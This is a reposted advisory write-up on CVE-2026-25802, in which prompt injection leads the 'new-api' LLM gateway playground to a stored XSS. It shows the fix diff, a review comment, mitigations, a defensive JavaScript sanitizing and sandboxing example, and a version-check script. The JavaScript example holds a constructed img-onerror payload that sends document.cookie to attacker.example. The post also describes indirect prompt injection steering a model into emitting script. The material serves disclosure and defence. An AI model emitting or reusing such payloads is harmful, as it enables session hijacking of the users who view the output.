DEV Community

CVE Reports

Originally published at cvereports.com

CVE-2026-25802: Prompt Injection to Stored XSS: Unpacking CVE-2026-25802 in new-api


Vulnerability ID: CVE-2026-25802
CVSS Score: 7.6
Published: 2026-02-23

A high-severity Cross-Site Scripting (XSS) vulnerability was disclosed in the 'new-api' LLM gateway, specifically in its playground component. The playground rendered model output as HTML in the victim's browser, so an attacker who can influence what the model says (directly, or through indirect prompt injection in content the model is asked to process) can have it emit markup that executes attacker-controlled JavaScript in the playground. The root cause is the use of React's 'dangerouslySetInnerHTML' on model output without sanitization.

TL;DR

The 'new-api' playground rendered model output as trusted HTML. By getting the model to emit HTML that carries an event handler or script, an attacker could trigger a Stored XSS in the playground UI and hijack the victim's session. Fixed in version 0.10.8-alpha.9, which renders the output inside a sandboxed iframe instead.


⚠️ Exploit Status: POC

Technical Details

  • CWE ID: CWE-79
  • CVSS Score: 7.6 (High)
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: Low
  • Impact: Session hijacking; any action the playground UI lets the victim perform, carried out with the victim's privileges (an administrator's, if an administrator views the injected output)
  • Exploit Status: PoC Available

Affected Systems

  • new-api (QuantumNous)
  • new-api: < 0.10.8-alpha.9 (Fixed in: 0.10.8-alpha.9)

Code Analysis

Commit: ab5456e

Refactor Markdown rendering to use sandboxed iframe and escape HTML in JSON viewer

- <div dangerouslySetInnerHTML={{ __html: content }} />
+ <iframe sandbox='allow-same-origin' srcDoc={code} />
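Review bot: the `+` line is safe only because `allow-scripts` is absent from the sandbox list, and nothing in the hunk records that as a requirement. `allow-same-origin` keeps the framed document on the playground's own origin, so if a later change adds `allow-scripts` (a common request once Markdown previews need interactivity), the injected script runs with full access to the parent page and can remove the `sandbox` attribute itself. Suggest dropping `allow-same-origin` unless the parent genuinely needs to read into the frame (for example to measure its height), or, if it must stay, adding a comment on that line such as `// srcDoc is untrusted LLM output: never add allow-scripts` together with a test that asserts the attribute value. Two smaller points: the commit message also mentions escaping HTML in the JSON viewer, but only the Markdown change is shown here, and the bound variable changes from `content` to `code` without explanation.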

Exploit Details

  • GitHub Advisory: Proof of concept in which a prompt makes the model emit HTML that redirects the playground page to Google.

Mitigation Strategies

  • HTML Sanitization: When the markup itself must be kept, run it through a sanitizer such as DOMPurify before it reaches a dangerous sink like 'dangerouslySetInnerHTML'.
  • Output Encoding: Always escape HTML entities when rendering user or AI-generated content.
  • Sandboxing: Use iframe sandboxing with strict policies (no 'allow-scripts') for untrusted HTML previews.
  • Content Security Policy (CSP): Implement a strict CSP that disallows inline scripts.
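The following is an added example, not code from new-api or from the advisory. It puts two of the mitigations above into working form: output encoding for the case where model output should appear as text, and a sandboxed preview frame whose sandbox tokens are checked so that the invariant the upstream fix depends on (no 'allow-scripts') cannot be loosened silently. The hostile model output, the attacker URL and the CSP string are constructed for the example; the CSP meta tag prepended to the srcdoc is this example's own extra layer and is not part of the upstream fix.

```javascript
// Added example, not new-api's code: output encoding and a checked sandbox
// policy applied to a constructed piece of hostile model output.

// Constructed payload of the kind an indirect prompt injection might coax out of
// a model. The attacker URL is made up for the example.
const UNTRUSTED_LLM_OUTPUT =
  '<p>Here is the summary you asked for.</p>' +
  '<img src=x onerror="location=\'https://attacker.example/?c=\'+document.cookie">';

// Path 1: output encoding. Escaping these five characters is enough for a value
// placed in an HTML text node or a quoted attribute; it is not a substitute for
// sanitization when the markup itself has to be preserved.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Path 2: render the markup inside a sandboxed iframe. The patched component is
// safe only while allow-scripts is absent; this check makes that explicit. The
// pair allow-scripts + allow-same-origin is flagged separately because it lets
// the framed document strip its own sandbox attribute.
const PREVIEW_FORBIDDEN = new Set([
  'allow-scripts',
  'allow-top-navigation',
  'allow-top-navigation-by-user-activation',
  'allow-forms',
  'allow-popups',
  'allow-modals',
]);

function validatePreviewSandbox(sandboxValue) {
  const tokens = sandboxValue.trim().split(/\s+/).filter(Boolean);
  const problems = tokens
    .filter((t) => PREVIEW_FORBIDDEN.has(t))
    .map((t) => `${t} is not allowed on an untrusted preview frame`);
  if (tokens.includes('allow-scripts') && tokens.includes('allow-same-origin')) {
    problems.push('allow-scripts plus allow-same-origin defeats the sandbox entirely');
  }
  return { ok: problems.length === 0, problems };
}

// Returns the attributes for the preview <iframe> (React spells them sandbox and
// srcDoc). The CSP <meta> prepended to the srcdoc is this example's own extra
// layer: even if the sandbox were loosened later, the framed document itself
// would still refuse to run script.
function buildPreviewFrame(renderedHtml, sandboxValue = 'allow-same-origin') {
  const check = validatePreviewSandbox(sandboxValue);
  if (!check.ok) throw new Error(check.problems.join('; '));
  const csp = "default-src 'none'; img-src data: https:; style-src 'unsafe-inline'";
  const srcdoc =
    `<!doctype html><meta http-equiv="Content-Security-Policy" content="${csp}">` +
    renderedHtml;
  return { sandbox: sandboxValue, srcdoc };
}

// The vulnerable sink next to the two hardened paths, on the constructed payload.
function demo() {
  const vulnerableSink = UNTRUSTED_LLM_OUTPUT;            // what dangerouslySetInnerHTML received
  const asText = escapeHtml(UNTRUSTED_LLM_OUTPUT);       // shown verbatim, no live markup
  const framed = buildPreviewFrame(UNTRUSTED_LLM_OUTPUT); // markup kept, script inert
  return {
    vulnerableHasHandler: vulnerableSink.includes('<img') && /onerror=/i.test(vulnerableSink),
    textHasNoTags: !/<[a-z]/i.test(asText),
    frameBlocksScript: !framed.sandbox.split(/\s+/).includes('allow-scripts'),
  };
}

console.log(demo());
```

The sandbox check belongs wherever the iframe attributes are assembled, so a future "just add allow-scripts" change fails a test instead of shipping. If the parent page does not need to read into the frame, drop 'allow-same-origin' as well and pass an empty sandbox value; validatePreviewSandbox accepts that too.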

Remediation Steps:

  1. Pull the latest Docker image or source code for new-api.
  2. Verify the version is at least 0.10.8-alpha.9.
  3. Restart the service container.
  4. Clear browser caches to ensure the new frontend assets are loaded.
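Step 2 above is the one that is easy to get wrong, because the fix landed in a prerelease: a naive string or numeric comparison will treat 0.10.8-alpha.10 as older than 0.10.8-alpha.9 and 0.10.8 as older than both. The following is an added example, not new-api's code or the advisory's, that compares a reported version string against the fixed release with prerelease ordering handled. It assumes version strings look like "0.10.8" or "0.10.8-alpha.9" (optionally prefixed with "v"), as the advisory writes them, and that a final release outranks any prerelease of the same base.

```shell
#!/bin/sh
# Added example (not new-api's code or the advisory's): decide whether a version
# string is at or past the fixed release 0.10.8-alpha.9.
# Assumptions: versions look like "0.10.8" or "0.10.8-alpha.9", optionally with a
# leading "v"; a final release is newer than any prerelease of the same base.

FIXED_VERSION="0.10.8-alpha.9"

# Print a fixed-width, string-sortable key: MAJOR MINOR PATCH PRERANK PRENUM.
version_key() {
  v=${1#v}
  base=${v%%-*}
  if [ "$base" = "$v" ]; then
    prerank=9; prenum=0              # final release outranks every prerelease
  else
    pre=${v#*-}                      # e.g. "alpha.9"
    tag=${pre%%.*}; prenum=${pre#*.}
    [ "$prenum" = "$pre" ] && prenum=0
    case "$tag" in
      alpha) prerank=1 ;;
      beta)  prerank=2 ;;
      rc)    prerank=3 ;;
      *)     prerank=0 ;;            # unknown tag: treat as oldest
    esac
  fi
  major=${base%%.*}; rest=${base#*.}
  minor=${rest%%.*}; patch=${rest#*.}
  printf '%05d%05d%05d%d%05d' "$major" "$minor" "$patch" "$prerank" "$prenum"
}

# True (exit 0) when $1 >= $2. Zero-padded keys make string comparison correct.
version_at_least() {
  a=$(version_key "$1"); b=$(version_key "$2")
  [ "$a" \> "$b" ] || [ "$a" = "$b" ]
}

# True when the given running version is at or past the fixed release.
is_patched() {
  version_at_least "$1" "$FIXED_VERSION"
}

# Usage: feed in whatever version string your deployment reports, e.g.
#   is_patched "$RUNNING_VERSION" && echo "patched" || echo "VULNERABLE: upgrade to $FIXED_VERSION"
```

Obtain the running version from wherever your deployment exposes it (the container image tag, the UI footer, or the service's own status endpoint) and pass it to is_patched; the function only does the comparison.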

